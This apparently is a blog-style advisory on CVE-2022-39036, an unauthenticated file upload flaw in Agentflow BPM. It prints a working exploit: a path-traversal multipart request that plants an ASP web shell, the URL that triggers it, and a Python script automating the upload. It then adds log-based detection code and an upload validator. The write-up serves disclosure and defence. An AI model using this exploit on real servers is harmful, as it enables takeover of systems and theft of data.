Agentflow BPM is a workflow and business process management platform used in many organizations to automate their business processes. While it offers useful features, a dangerous security flaw—CVE-2022-39036—was discovered in its file upload feature. This vulnerability lets an attacker upload malicious files and run arbitrary code on the server with little to no effort and no authentication required.

Let’s break down what this means, how it works, and how attackers could use it in real-world attacks.

What is CVE-2022-39036?

CVE-2022-39036 is a vulnerability found in Agentflow BPM where the application does not properly filter special characters in file upload URLs. This allows an unauthenticated remote attacker to:

- Upload any file type (including PHP/ASP/JSP scripts)

How Does the Vulnerability Work?

A common feature in any business process platform is the ability to upload documents (like receipts, PDFs, etc.). A secure application should:

- Restrict upload locations

But Agentflow BPM failed to do so for upload URLs.

By crafting a special request, attackers can upload arbitrary files—even executable scripts—to the webroot or another location where they can be executed on the server!

> “Insufficient filtering for special characters in URLs” means the application doesn’t filter out dangerous path traversal characters (../) or special file extensions (.php, .asp, etc.).

Suppose Agentflow BPM has an endpoint like

POST /bpm/file/upload HTTP/1.1

A legitimate upload might look like this:

POST /bpm/file/upload HTTP/1.1
Host: agentflow.example.com
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary

------WebKitFormBoundary
Content-Disposition: form-data; name="file"; filename="document.pdf"
Content-Type: application/pdf

%PDF-1.4 binary content...
------WebKitFormBoundary--

But the attacker places path traversal sequences in the filename:

POST /bpm/file/upload HTTP/1.1
Host: agentflow.example.com
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary

------WebKitFormBoundary
Content-Disposition: form-data; name="file"; filename="../../../../webroot/shell.asp"
Content-Type: application/octet-stream

<%eval request("pass")%>
------WebKitFormBoundary--

After upload, the attacker can visit

http://agentflow.example.com/shell.asp?pass=malicious_code

Now, they can run code of their choice on the server.

Here’s a Python code snippet using requests to automate the exploit

import requests

# Upload endpoint from the request examples above
url = "http://agentflow.example.com/bpm/file/upload"
files = {
    # (filename, content, content-type): the filename carries the traversal sequence
    "file": ("../../../../webroot/shell.asp", '<%eval request("pass")%>', "application/octet-stream"),
}

response = requests.post(url, files=files)
print(response.text)  # Should report successful upload
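The request sequence above also leaves a recognisable trace in ordinary web server access logs: a POST to the upload endpoint from one client, followed shortly by a request for a server-side script that the application never served before. The following detection script is an added example written for this post, not code from the original write-up or from the Agentflow vendor. It assumes Apache/NGINX combined log format, takes the `/bpm/file/upload` endpoint path from the write-up, treats `/bpm/` as a hypothetical allowlist prefix for the application's own routes, and runs over constructed sample log lines rather than real traffic.

```python
import re
from datetime import datetime, timedelta
from urllib.parse import unquote

# Upload endpoint taken from the write-up; the application prefix is a hypothetical
# allowlist of routes the real application is known to serve itself.
UPLOAD_ENDPOINT = "/bpm/file/upload"
KNOWN_APP_PREFIX = "/bpm/"
SCRIPT_EXTENSIONS = (".asp", ".aspx", ".php", ".jsp", ".jspx")
WINDOW = timedelta(minutes=10)

# Combined-log-format line: client, ident, user, [timestamp], "METHOD URL PROTO", status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<url>\S+) [^"]*" (?P<status>\d{3})'
)
# Raw or once-URL-encoded traversal sequences
TRAVERSAL_RE = re.compile(r"\.\./|\.\.\\|%2e%2e", re.IGNORECASE)

# Constructed sample log lines (not real traffic): one client uploads and then
# requests a script outside the application routes; another uploads and then
# fetches a PDF normally; a third sends a traversal probe and an unrelated request.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Nov/2022:15:10:01 +0000] "POST /bpm/file/upload HTTP/1.1" 200 312
203.0.113.7 - - [10/Nov/2022:15:10:09 +0000] "GET /shell.asp?pass=REDACTED HTTP/1.1" 200 58
198.51.100.4 - - [10/Nov/2022:15:11:30 +0000] "POST /bpm/file/upload HTTP/1.1" 200 312
198.51.100.4 - - [10/Nov/2022:15:12:02 +0000] "GET /bpm/files/document.pdf HTTP/1.1" 200 90211
192.0.2.9 - - [10/Nov/2022:15:13:00 +0000] "GET /bpm/..%2F..%2Fweb.config HTTP/1.1" 404 196
192.0.2.9 - - [10/Nov/2022:15:13:05 +0000] "GET /login.asp HTTP/1.1" 200 1204
"""


def parse_line(line):
    """Return a dict with ip, ts (aware datetime), method, url, status, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {
        "ip": m["ip"],
        "ts": datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z"),
        "method": m["method"],
        "url": m["url"],
        "status": int(m["status"]),
    }


def find_suspicious(lines):
    """Apply two rules and return (ip, rule, url, status) tuples in log order.

    1. traversal-sequence: the URL contains ../ (raw or URL-encoded).
    2. script-after-upload: a client POSTs to the upload endpoint and, within
       WINDOW, requests a server-side script outside the known application routes.
    """
    alerts = []
    last_upload = {}  # client ip -> time of its most recent upload POST
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        path = rec["url"].split("?", 1)[0]
        if TRAVERSAL_RE.search(rec["url"]) or TRAVERSAL_RE.search(unquote(rec["url"])):
            alerts.append((rec["ip"], "traversal-sequence", rec["url"], rec["status"]))
        if rec["method"] == "POST" and path == UPLOAD_ENDPOINT:
            last_upload[rec["ip"]] = rec["ts"]
            continue
        if path.lower().endswith(SCRIPT_EXTENSIONS) and not path.startswith(KNOWN_APP_PREFIX):
            uploaded_at = last_upload.get(rec["ip"])
            if uploaded_at is not None and rec["ts"] - uploaded_at <= WINDOW:
                alerts.append((rec["ip"], "script-after-upload", rec["url"], rec["status"]))
    return alerts


if __name__ == "__main__":
    for alert in find_suspicious(SAMPLE_LOG.splitlines()):
        print(alert)
```

Only the first client trips the second rule: the second client fetches a PDF, and the third client requests a script without a preceding upload. The status code is carried in each alert because a 404 for the script still tells you someone tried, while a 200 means the file landed where it could execute.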

Potential Impact

- Remote Code Execution (RCE): The attacker can run any code, steal data, or create new administrator accounts.
- Service Disruption: Taking the site or business process offline.
- Data Theft/Ransomware: Stealing or encrypting sensitive documents.
- Pivot to further attacks within the internal company network.

Attackers don’t require a login, making automated large-scale attacks possible.

References & Further Reading

- National Vulnerability Database: CVE-2022-39036
- AgentFlow Website
- SecurityFocus BID 70674  
- Common File Upload Vulnerabilities
- Example of Web Shells

Mitigation

- Update Agentflow BPM to the latest version; patches should block this attack.
- Restrict file types and sanitize file paths/names in upload code.
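To make the "restrict upload locations" and "sanitize file paths/names" advice concrete, here is an added example of server-side upload validation. It is not code from Agentflow BPM or from the original post. It parses the two multipart bodies shown earlier (reconstructed with CRLF line endings), assumes a hypothetical upload directory `/srv/agentflow/uploads` that sits outside the webroot, and uses an extension allowlist chosen for illustration. The validator rejects rather than repairs: a filename containing a directory separator is refused outright, because a client has no business choosing where the file lands.

```python
import re
from pathlib import Path

# Hypothetical upload directory; it must live OUTSIDE the webroot so that nothing
# written here can be executed by the web server.
UPLOAD_ROOT = "/srv/agentflow/uploads"
ALLOWED_EXTENSIONS = {".pdf", ".png", ".jpg", ".jpeg", ".docx", ".xlsx"}
SCRIPT_EXTENSIONS = {".asp", ".aspx", ".php", ".jsp", ".jspx"}

BOUNDARY = "----WebKitFormBoundary"
# The two request bodies from the write-up, reconstructed with CRLF line endings.
LEGIT_BODY = (
    "------WebKitFormBoundary\r\n"
    'Content-Disposition: form-data; name="file"; filename="document.pdf"\r\n'
    "Content-Type: application/pdf\r\n"
    "\r\n"
    "%PDF-1.4 binary content...\r\n"
    "------WebKitFormBoundary--\r\n"
)
MALICIOUS_BODY = (
    "------WebKitFormBoundary\r\n"
    'Content-Disposition: form-data; name="file"; filename="../../../../webroot/shell.asp"\r\n'
    "Content-Type: application/octet-stream\r\n"
    "\r\n"
    '<%eval request("pass")%>\r\n'
    "------WebKitFormBoundary--\r\n"
)


def extract_filenames(body, boundary):
    """Return the filename parameter of every file part in a multipart/form-data body."""
    names = []
    for piece in body.split("--" + boundary)[1:]:   # drop anything before the first delimiter
        if piece.startswith("--"):                  # "--boundary--" closes the body
            break
        headers = piece.lstrip("\r\n").split("\r\n\r\n", 1)[0]
        m = re.search(r'filename="([^"]*)"', headers, re.IGNORECASE)
        if m:
            names.append(m.group(1))
    return names


def validate_upload(filename, upload_root=UPLOAD_ROOT):
    """Return (True, destination path) or (False, reason). Rejects, never silently repairs."""
    if not filename or any(ord(c) < 32 for c in filename):
        return False, "empty filename or control characters"
    # Any directory separator means the client is trying to choose the location.
    if "/" in filename or "\\" in filename:
        return False, "path separators in filename (traversal attempt)"
    if filename in (".", "..") or filename.startswith("."):
        return False, "dot-file or relative component"
    suffixes = [s.lower() for s in Path(filename).suffixes]
    if not suffixes or suffixes[-1] not in ALLOWED_EXTENSIONS:
        return False, "extension not in allowlist: " + (suffixes[-1] if suffixes else "(none)")
    # Double extensions such as shell.asp.pdf are rejected outright.
    if any(s in SCRIPT_EXTENSIONS for s in suffixes):
        return False, "server-side script extension present"
    base = Path(upload_root).resolve()
    target = (base / filename).resolve()
    if target.parent != base:   # belt and braces: the final path must sit directly under the root
        return False, "resolved path escapes upload root"
    return True, str(target)


def process_upload_body(body, boundary=BOUNDARY, upload_root=UPLOAD_ROOT):
    """Validate every file part; returns a list of (filename, accepted, detail)."""
    return [(name,) + validate_upload(name, upload_root) for name in extract_filenames(body, boundary)]


if __name__ == "__main__":
    for body in (LEGIT_BODY, MALICIOUS_BODY):
        print(process_upload_body(body))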

Conclusion

CVE-2022-39036 is a critical security hole in Agentflow BPM that makes it dangerously easy for attackers to take over or disrupt a system. If you run Agentflow BPM, update your platform immediately and check for signs of compromise. For defenders, always scrutinize file upload features—it’s one of the oldest and most dangerous web app attack vectors out there.


> Note: This post is provided for educational and defensive purposes only. Do not attempt to exploit systems without authorization.

Timeline

Published on: 11/10/2022 15:15:00 UTC
Last modified on: 11/10/2022 15:22:00 UTC